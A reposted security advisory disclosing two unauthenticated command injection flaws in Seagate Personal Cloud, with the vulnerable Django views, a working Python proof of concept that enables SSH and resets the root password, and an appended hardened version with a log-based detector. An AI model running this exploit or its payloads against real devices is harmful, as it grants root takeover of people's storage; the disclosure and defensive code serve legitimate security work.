{"id":11081,"date":"2018-01-11T14:19:13","date_gmt":"2018-01-11T22:19:13","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/11\/news-4852\/"},"modified":"2018-01-11T14:19:13","modified_gmt":"2018-01-11T22:19:13","slug":"news-4852","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/01\/11\/news-4852\/","title":{"rendered":"SSD Advisory \u2013 Seagate Personal Cloud Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Thu, 11 Jan 2018 13:45:21 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><br \/> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities summary<\/strong><br \/> The following advisory describes two (2) unauthenticated command injection vulnerabilities in Seagate Personal Cloud.<\/p>\n<p>Seagate Personal Cloud Home Media Storage is &#8220;the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Yorick Koster, reported these vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Seagate was informed of the vulnerabilities on October 16; while acknowledging receipt of the vulnerability information, it refused to respond to the technical claims, to give a fix timeline, or to coordinate an advisory.<br \/> <span 
id=\"more-3548\"><\/span><br \/> <strong><u>Vulnerabilities details<\/u><\/strong><br \/> Seagate Media Server is built on the Django web framework and is mapped to the .psp extension.<\/p>\n<p>Any URL that ends with .psp is automatically sent to the Seagate Media Server application over the FastCGI protocol: lighttpd hands the request to the Django process listening on the Unix socket named below.<br \/> \/etc\/lighttpd\/conf.d\/django-host.conf:<\/p>\n<pre><code>fastcgi.server += (\n  \".psp\"=&gt;\n    ((\n       \"socket\" =&gt; \"\/var\/run\/manage_py-fastcgi.socket\",\n       \"check-local\" =&gt; \"disable\",\n       \"stream-post\" =&gt; \"enable\",\n       \"allow-x-send-file\" =&gt; \"enable\",\n    )),\n  \".psp\/\"=&gt;\n    ((\n       \"socket\" =&gt; \"\/var\/run\/manage_py-fastcgi.socket\",\n       \"check-local\" =&gt; \"disable\",\n       \"stream-post\" =&gt; \"enable\",\n       \"allow-x-send-file\" =&gt; \"enable\",\n    ))\n)<\/code><\/pre>\n<p>URLs are mapped to specific views in the file <em>\/usr\/lib\/django_host\/seagate_media_server\/urls.py<\/em>.<\/p>\n<p>Two views were found to be affected by unauthenticated command injection.<\/p>\n<p>The affected views are:<\/p>\n<ul>\n<li>uploadTelemetry<\/li>\n<li>getLogs<\/li>\n<\/ul>\n<p>These views take user input from GET parameters and pass it, unvalidated and unsanitized, to methods of the Python <em>commands<\/em> module. commands.getoutput and commands.getstatusoutput run their argument through \/bin\/sh, so shell metacharacters in a parameter value (such as ;, | or $(...)) end the intended command line and start an attacker-chosen one.<\/p>\n<p>This allows an attacker to inject arbitrary system commands, which are executed with root privileges.<\/p>\n<p>\/usr\/lib\/django_host\/seagate_media_server\/views.py:<\/p>\n<pre><code>@csrf_exempt\ndef uploadTelemetry(request):\n   ts = request.GET.get('TimeStamp','')\n   if (checkDBSQLite()) :\n      response = '{\"stat\":\"failed\",\"code\":\"80\",\"message\":\"The Database has not been initialized or mounted yet!\"}'\n   else :\n      if ts == \"\":\n         response = '{\"stat\":\"failed\",\"code\":\"380\",\"message\":\"TimeStamp parameter missing\"}'\n         return HttpResponse(response);\n      cmd = \"\/usr\/local\/bin\/log_telemetry \"+str(ts)\n      commands.getoutput(cmd)\n   return HttpResponse('{\"stat\":\"ok\"}')<\/code><\/pre>\n<p>\/usr\/lib\/django_host\/seagate_media_server\/views.py:<\/p>\n<pre><code>@csrf_exempt\ndef getLogs (request):\n   try:\n      cmd_base='\/usr\/bin\/log-extract-manager.sh'\n      uID = request.GET.get ( 'arch_id', None )\n      time_stamp = request.GET.get ( 'time_stamp', '' )\n\n      if uID:\n         (status, output) = commands.getstatusoutput(cmd_base + ' status ' + uID);\n         if ('In progress' in output) and (uID in output) :\n            return HttpResponse ('{\"stat\":\"ok\", \"data\": {\"status\":\"In Progress\"}}')\n         elif (status == 0) :\n            return HttpResponse ('{\"stat\":\"ok\", \"data\": {\"url\":\"%s\", \"fileSize\":\"%d\"}}' % ( urllib.quote(output.encode('utf-8')), os.path.getsize(output) ))\n         else :\n            return HttpResponse ('{\"stat\":\"failed\", \"code\":\"853\",\"message\":\"Id not recognized.\"}' )\n      else:\n         (status, output) = commands.getstatusoutput(cmd_base + ' start ' + time_stamp);\n         if (status == 0) :\n            return HttpResponse ('{\"stat\":\"ok\", \"data\": {\"archiveID\":\"%s\"}}' % (output))\n\n      return HttpResponse ('{\"stat\":\"failed\", \"code\":\"852\",\"message\":\"Zip file not created.\"}' )\n   except :\n      return HttpResponse ('{\"stat\":\"failed\", \"code\":\"852\",\"message\":\"Zip file not created.\"}' )<\/code><\/pre>\n<p>Both the arch_id and time_stamp parameters of getLogs reach the shell: arch_id through the status branch and time_stamp through the start branch. In the start branch the command output is reflected back in the archiveID field whenever the shell exits with status 0, so the output of an injected command can be read directly from the response.<\/p>\n<p>Note that both views carry the csrf_exempt decorator, which disables Django's default Cross-Site Request Forgery protection. As such, these issues can also be exploited via Cross-Site Request Forgery from a web page visited by a user whose browser can reach the device. (Django's CSRF middleware only checks unsafe methods such as POST in any case, and both views read their parameters from the query string, so a plain GET request is enough.)<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> The following proof of concept will try to enable the SSH service and change the root password. 
When successful it will be possible to log into the device over SSH with the new password.<\/p>\n<div id=\"crayon-5a57e2e1072d0284540628\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">#!\/usr\/bin\/env python\nimport os\nimport urllib\n\nscheme = &#39;http&#39;\nhost = &#39;personalcloud.local&#39;\nport = &#39;80&#39;\npath = &#39;uploadTelemetry.psp&#39;\nquerystr = &#39;TimeStamp=%3b&#39;\n#path = &#39;getLogs.psp&#39;\n#querystr = &#39;time_stamp=%3b&#39;\npassword = &#39;Welcome01&#39;\n\ncmds = [&#39;ngc --start sshd 2&gt;&amp;1&#39;,\n        &#39;echo -e &quot;%(s)s\\n%(s)s&quot;|passwd 2&gt;&amp;1&#39; % {&#39;s&#39; : password}]\n\nfor cmd in cmds:\n    print &#39;Running command&#39;, repr(cmd)\n    cmd = urllib.quote_plus(cmd)\n    r = urllib.urlopen(&#39;%s:\/\/%s:%s\/%s?%s%s&#39; % (scheme, host, port, path, querystr, cmd))\n    print r.read()\n\nprint &#39;Log in with&#39;, password\nos.system(&#39;ssh -p 2222 root@%s&#39; % host)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urllib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-4\"><span class=\"crayon-e\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-5\"><span class=\"crayon-v\">scheme<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#39;http&#39;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-6\"><span class=\"crayon-v\">host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#39;personalcloud.local&#39;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-7\"><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#39;80&#39;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-8\"><span class=\"crayon-v\">path<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#39;uploadTelemetry.psp&#39;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-9\"><span class=\"crayon-v\">querystr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#39;TimeStamp=%3b&#39;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-10\"><span class=\"crayon-p\">#path = &#39;getLogs.psp&#39;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-11\"><span class=\"crayon-p\">#querystr = &#39;time_stamp=%3b&#39;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-12\"><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#39;Welcome01&#39;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-14\"><span class=\"crayon-v\">cmds<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#39;ngc --start sshd 2&gt;&amp;1&#39;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#39;echo -e &quot;%(s)s\\n%(s)s&quot;|passwd 2&gt;&amp;1&#39;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#39;s&#39;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-17\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cmd <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmds<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#39;Running command&#39;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">repr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-19\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">quote_plus<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">urlopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#39;%s:\/\/%s:%s\/%s?%s%s&#39;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">scheme<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">querystr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-21\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-22\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-23\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#39;Log in with&#39;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">password<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-24\"><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#39;ssh -p 2222 root@%s&#39;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3548\" target=\"bwo\" 
>https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 11 Jan 2018 13:45:21 +0000<\/strong><\/p>\n<p>Vulnerabilities summary The following advisory describes two (2) unauthenticated command injection vulnerabilities. Seagate Personal Cloud Home Media Storage is &#8220;the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.&#8221; Credit An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program Vendor &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3548\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Seagate Personal Cloud Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11851,10757],"class_list":["post-11081","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-command-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11081","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.p
hp\/wp-json\/wp\/v2\/comments?post=11081"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11081\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11081"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11081"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11081"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
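
The following is an added example written for this page; it is not code from the advisory, from Yorick Koster, or from Seagate. It shows the pattern the two .psp views share (the TimeStamp / time_stamp parameter concatenated into a string handed to commands.getstatusoutput, i.e. to /bin/sh) beside a hardened form that allow-lists the value and runs the helper through an argv list with no shell, and a detector that flags access-log lines carrying the request shape the proof of concept sends. It is Python 3 rather than the Python 2 of the proof of concept. CMD_BASE stands in for the device's real cmd_base (not shown on this page), the digits-only timestamp format is an assumption, and the access-log lines are constructed.

```python
"""
Added example (not from the advisory or from Seagate): the vulnerable
concatenation pattern next to a hardened equivalent, plus a log-side check
for the request shape the proof of concept sends. CMD_BASE, the timestamp
format, and the access-log lines are assumptions made for illustration.
"""
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# Stand-in for the device's archive helper; the advisory does not show the real
# value of cmd_base, so a harmless binary on PATH is used here (assumption).
CMD_BASE = "true"

# Only a digits-only timestamp is accepted. The advisory does not document the
# real format, so this is the strictest plausible allow-list (assumption).
TIMESTAMP_RE = re.compile(r"\A[0-9]{1,20}\Z")


def vulnerable_command_line(time_stamp):
    """The advisory's pattern, returned instead of executed.

    commands.getstatusoutput() passes this string to /bin/sh -c, so a value
    such as ';id' ends the intended command and starts an attacker's.
    """
    return CMD_BASE + " start " + time_stamp


def safe_argv(time_stamp):
    """Allow-list the input, then build an argv list so no shell parses it."""
    if not TIMESTAMP_RE.match(time_stamp):
        raise ValueError("rejected time_stamp: %r" % (time_stamp,))
    return [CMD_BASE, "start", time_stamp]


def is_rejected(time_stamp):
    """True when safe_argv() refuses the value."""
    try:
        safe_argv(time_stamp)
    except ValueError:
        return True
    return False


def run_safe(time_stamp):
    """Execute with shell=False; returns (status, output) like getstatusoutput."""
    proc = subprocess.run(safe_argv(time_stamp), capture_output=True, text=True)
    return proc.returncode, proc.stdout.strip()


# Constructed lighttpd-style access-log lines (not real device logs). The first
# two carry the proof of concept's payloads, percent-encoded the way
# urllib.quote_plus sends them; the third is a benign request to the same view.
SAMPLE_LOG = """\
192.168.1.50 personalcloud.local - [11/Jan/2018:13:45:21 +0000] "GET /uploadTelemetry.psp?TimeStamp=%3Bngc+--start+sshd+2%3E%261 HTTP/1.1" 200 45 "-" "Python-urllib/2.7"
192.168.1.50 personalcloud.local - [11/Jan/2018:13:45:22 +0000] "GET /getLogs.psp?time_stamp=%3Becho+-e+%22pw%5Cnpw%22%7Cpasswd+2%3E%261 HTTP/1.1" 200 52 "-" "Python-urllib/2.7"
192.168.1.23 personalcloud.local - [11/Jan/2018:13:46:01 +0000] "GET /uploadTelemetry.psp?TimeStamp=1515678361 HTTP/1.1" 200 40 "-" "Mozilla/5.0"
192.168.1.23 personalcloud.local - [11/Jan/2018:13:46:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
SHELL_META = re.compile(r"[;|&`$<>\n]")
# View name (lower-cased) -> the parameter that reaches the shell.
WATCHED = {"uploadtelemetry.psp": "TimeStamp", "getlogs.psp": "time_stamp"}


def flag_injection_attempts(log_text):
    """Return (client, path) for requests whose watched parameter holds shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        param = WATCHED.get(url.path.rsplit("/", 1)[-1].lower())
        if param is None:
            continue
        # parse_qs undoes the percent-encoding, so the check sees the real bytes
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        if any(SHELL_META.search(v) for v in values):
            hits.append((line.split(" ", 1)[0], url.path))
    return hits


if __name__ == "__main__":
    print(vulnerable_command_line(";id"))
    print(run_safe("1515678361"))
    for client, path in flag_injection_attempts(SAMPLE_LOG):
        print("possible command injection from %s against %s" % (client, path))
```

The allow-list plus argv list removes the shell from the path entirely, which is the property the original views lack; a fix for the real handlers would in addition drop csrf_exempt and require authentication, since the advisory describes both views as reachable without it. The detector only inspects the two parameters the advisory names, so a pre-fix device can be monitored without flagging every request that happens to contain a semicolon.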